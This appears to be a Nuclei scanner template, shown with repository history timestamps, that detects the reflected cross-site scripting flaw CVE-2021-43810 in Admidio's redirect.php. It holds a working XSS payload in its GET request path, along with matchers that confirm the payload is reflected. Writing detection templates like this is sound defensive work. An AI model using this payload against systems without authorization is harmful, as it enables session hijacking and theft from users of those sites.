nuclei-templates/http/cves/2021/CVE-2021-43810.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

id: CVE-2021-43810
info:
name: Admidio - Cross-Site Scripting
author: gy741
severity: medium
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 12:09:01 +00:00
remediation: Upgrade to version 4.0.12 or later.
reference:
2022-01-25 07:04:20 +00:00
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
- https://github.com/Admidio/admidio/commit/fcb0609abc1d2f65bc1377866bd678e5d891404b
- https://github.com/Admidio/admidio/commit/c043267d362f7813543cc2785119bf3e3e54fe21
2023-07-11 19:49:27 +00:00
- https://github.com/Admidio/admidio/releases/tag/v4.0.12
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2021-43810
cwe-id: CWE-79
2024-05-31 19:23:20 +00:00
epss-score: 0.00396
epss-percentile: 0.73393
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: admidio
product: admidio
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,admidio,xss
http:
- method: GET
path:
- '{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)'
matchers-condition: and
matchers:
- type: word
part: body
2022-01-25 07:04:20 +00:00
words:
- 'please click <a href="javascript://%0aalert(document.domain)" target="_self">'
- type: word
2022-01-25 07:04:20 +00:00
part: header
words:
- "text/html"
2022-01-25 07:04:20 +00:00
- type: status
status:
- 200
# digest: 4a0a00473045022100953a61bb137c40872ac341046a3d349378dfe44509b0bf81b8dea18ef859cc9402206cb18380503695b43cd279e399ef8aaa40547d01d55325928f48b3e8ed5a395b:922c64590222798bb761d5b6d8e72950